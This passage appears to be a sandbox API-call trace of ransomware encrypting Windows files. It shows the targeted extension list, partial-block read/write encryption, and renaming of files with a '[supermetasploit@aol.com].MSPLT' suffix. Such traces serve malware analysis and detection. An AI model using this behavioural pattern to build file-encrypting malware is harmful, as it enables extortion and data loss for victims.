lpString2=".exe") returned -1 [0181.632] lstrlenW (lpString=".docx") returned 5 [0181.632] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0181.633] lstrlenW (lpString=".pdf") returned 4 [0181.633] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0181.633] lstrlenW (lpString=".xls") returned 4 [0181.633] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0181.633] lstrlenW (lpString=".xlsx") returned 5 [0181.633] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0181.633] lstrlenW (lpString=".ppt") returned 4 [0181.633] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0181.633] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.633] lstrlenW (lpString=".zip") returned 4 [0181.633] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0181.633] lstrlenW (lpString=".rar") returned 4 [0181.633] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0181.633] lstrlenW (lpString=".bz2") returned 4 [0181.633] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0181.633] lstrlenW (lpString=".7z") returned 3 [0181.633] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0181.633] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.633] lstrlenW (lpString=".dbf") returned 4 [0181.633] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0181.633] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.633] lstrlenW (lpString=".1cd") returned 4 [0181.633] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0181.633] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.633] lstrlenW (lpString=".jpg") returned 4 [0181.633] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0181.634] lstrcmpiW (lpString1=".msu", lpString2=".MSPLT") returned 1 [0181.634] lstrlenW (lpString="Windows6.0-KB956250-v6001-x86.msu") returned 33 [0181.634] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0181.634] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=2192672) returned 1 [0181.634] CloseHandle (hObject=0x388) returned 1 [0181.634] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu")) returned 0x80 [0181.634] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.634] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0181.635] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0181.635] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0x0) returned 1 [0181.635] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0181.635] ReadFile (in: hFile=0x388, lpBuffer=0x3b47058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3b47058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0182.295] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0182.295] ReadFile (in: hFile=0x388, lpBuffer=0x3b87058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3b87058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0182.522] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0182.523] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0182.523] ReadFile (in: hFile=0x388, lpBuffer=0x3bc7058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3bc7058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0183.104] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.104] WriteFile (in: hFile=0x388, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x355fca8, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0183.127] SetEndOfFile (hFile=0x388) returned 1 [0183.127] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3ff82b8 [0183.217] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0183.217] WriteFile (in: hFile=0x388, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0183.219] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0183.219] WriteFile (in: hFile=0x388, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0183.222] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0183.222] WriteFile (in: hFile=0x388, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0183.223] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ff82b8 | out: hHeap=0x710000) returned 1 [0183.223] CloseHandle (hObject=0x388) returned 1 [0185.129] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0185.129] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.130] lstrlenW (lpString=".doc") returned 4 [0185.130] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0185.130] lstrlenW (lpString=".docx") returned 5 [0185.130] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0185.130] lstrlenW (lpString=".pdf") returned 4 [0185.130] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0185.130] lstrlenW (lpString=".xls") returned 4 [0185.130] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0185.130] lstrlenW (lpString=".xlsx") returned 5 [0185.130] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0185.130] lstrlenW (lpString=".ppt") returned 4 [0185.130] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0185.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.130] lstrlenW (lpString=".zip") returned 4 [0185.130] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0185.130] lstrlenW (lpString=".rar") returned 4 [0185.130] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0185.130] lstrlenW (lpString=".bz2") returned 4 [0185.130] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0185.130] lstrlenW (lpString=".7z") returned 3 [0185.130] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0185.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.130] lstrlenW (lpString=".dbf") returned 4 [0185.130] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0185.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.130] lstrlenW (lpString=".1cd") returned 4 [0185.130] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0185.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.131] lstrlenW (lpString=".jpg") returned 4 [0185.131] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0185.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.131] lstrlenW (lpString=".doc") returned 4 [0185.131] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0185.131] lstrlenW (lpString=".docx") returned 5 [0185.131] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0185.131] lstrlenW (lpString=".pdf") returned 4 [0185.131] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0185.131] lstrlenW (lpString=".xls") returned 4 [0185.131] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0185.131] lstrlenW (lpString=".xlsx") returned 5 [0185.131] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0185.131] lstrlenW (lpString=".ppt") returned 4 [0185.131] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0185.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.131] lstrlenW (lpString=".zip") returned 4 [0185.131] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0185.131] lstrlenW (lpString=".rar") returned 4 [0185.131] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0185.131] lstrlenW (lpString=".bz2") returned 4 [0185.131] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0185.131] lstrlenW (lpString=".7z") returned 3 [0185.132] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0185.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.132] lstrlenW (lpString=".dbf") returned 4 [0185.132] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0185.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.132] lstrlenW (lpString=".1cd") returned 4 [0185.132] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0185.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0185.132] lstrlenW (lpString=".jpg") returned 4 [0185.132] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0185.133] lstrcmpiW (lpString1=".msu", lpString2=".MSPLT") returned 1 [0185.133] lstrlenW (lpString="Windows6.1-KB958488-v6001-x86.msu") returned 33 [0185.133] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.133] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=2141433) returned 1 [0185.133] CloseHandle (hObject=0x388) returned 1 [0185.133] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu")) returned 0x80 [0185.134] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.134] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0185.134] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.135] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0x0) returned 1 [0185.135] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0185.135] ReadFile (in: hFile=0x388, lpBuffer=0x3b47058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3b47058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0185.141] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0185.141] ReadFile (in: hFile=0x388, lpBuffer=0x3b87058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3b87058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0185.149] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0185.149] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0185.149] ReadFile (in: hFile=0x388, lpBuffer=0x3bc7058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3bc7058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0185.695] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.695] WriteFile (in: hFile=0x388, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x355fca8, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0185.717] SetEndOfFile (hFile=0x388) returned 1 [0185.717] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3ff82b8 [0185.725] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0185.725] WriteFile (in: hFile=0x388, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0186.161] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0186.161] WriteFile (in: hFile=0x388, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0186.164] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0186.164] WriteFile (in: hFile=0x388, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0186.166] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ff82b8 | out: hHeap=0x710000) returned 1 [0186.169] CloseHandle (hObject=0x388) returned 1 [0186.874] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0186.875] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.875] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.875] lstrlenW (lpString=".doc") returned 4 [0186.875] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0186.876] lstrlenW (lpString=".docx") returned 5 [0186.876] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0186.876] lstrlenW (lpString=".pdf") returned 4 [0186.876] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0186.876] lstrlenW (lpString=".xls") returned 4 [0186.876] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0186.876] lstrlenW (lpString=".xlsx") returned 5 [0186.876] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0186.876] lstrlenW (lpString=".ppt") returned 4 [0186.876] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0186.876] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.876] lstrlenW (lpString=".zip") returned 4 [0186.876] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0186.876] lstrlenW (lpString=".rar") returned 4 [0186.876] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0186.876] lstrlenW (lpString=".bz2") returned 4 [0186.876] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0186.876] lstrlenW (lpString=".7z") returned 3 [0186.876] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0186.876] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.876] lstrlenW (lpString=".dbf") returned 4 [0186.877] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0186.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.877] lstrlenW (lpString=".1cd") returned 4 [0186.877] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0186.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.877] lstrlenW (lpString=".jpg") returned 4 [0186.877] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0186.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.877] lstrlenW (lpString=".doc") returned 4 [0186.877] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0186.877] lstrlenW (lpString=".docx") returned 5 [0186.877] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0186.877] lstrlenW (lpString=".pdf") returned 4 [0186.877] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0186.877] lstrlenW (lpString=".xls") returned 4 [0186.877] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0186.877] lstrlenW (lpString=".xlsx") returned 5 [0186.878] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0186.878] lstrlenW (lpString=".ppt") returned 4 [0186.878] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0186.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.878] lstrlenW (lpString=".zip") returned 4 [0186.878] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0186.878] lstrlenW (lpString=".rar") returned 4 [0186.878] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0186.878] lstrlenW (lpString=".bz2") returned 4 [0186.878] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0186.878] lstrlenW (lpString=".7z") returned 3 [0186.878] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0186.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.878] lstrlenW (lpString=".dbf") returned 4 [0186.878] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0186.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.878] lstrlenW (lpString=".1cd") returned 4 [0186.878] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0186.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0186.879] lstrlenW (lpString=".jpg") returned 4 [0186.879] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0186.879] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0186.879] lstrlenW (lpString="msjhn_boot.ttf") returned 14 [0186.879] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 19 os_tid = 0xd6c [0167.269] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3281258 [0167.270] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3291260 [0167.270] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af48 [0167.270] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d140 [0167.270] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af60 [0167.270] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x3c5e020 [0167.274] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af78 [0167.274] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af78, Size=0x20) returned 0x74e930 [0167.274] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af78 [0167.274] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af78, Size=0x20) returned 0x74e958 [0167.274] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0167.274] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0167.274] Wow64DisableWow64FsRedirection (in: OldValue=0x369ff50 | out: OldValue=0x369ff50*=0x0) returned 1 [0167.274] lstrlenW (lpString="kernel32.dll") returned 12 [0167.274] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e930 | out: hHeap=0x710000) returned 1 [0167.274] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0167.274] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e958 | out: hHeap=0x710000) returned 1 [0167.275] Sleep (dwMilliseconds=0x64) [0167.653] lstrcmpiW (lpString1=".cmd", lpString2=".MSPLT") returned -1 [0167.653] lstrlenW (lpString="PartnerSetupComplete.cmd") returned 24 [0167.653] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0167.902] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=577) returned 1 [0167.903] CloseHandle (hObject=0x2d4) returned 1 [0167.903] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 0x20 [0167.903] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.643] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0168.643] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.643] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.653] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0168.671] GetLastError () returned 0x0 [0168.671] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: 